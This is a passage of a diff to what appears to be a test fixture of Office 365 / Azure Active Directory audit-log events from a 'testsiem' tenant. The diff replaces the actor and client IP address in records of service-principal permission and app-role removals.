t.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -9792,9 +9792,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:16:18",
 "ExtendedProperties": [
 {
@@ -10028,7 +10028,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -10058,9 +10058,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:17:00",
 "ExtendedProperties": [
 {
@@ -10294,7 +10294,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
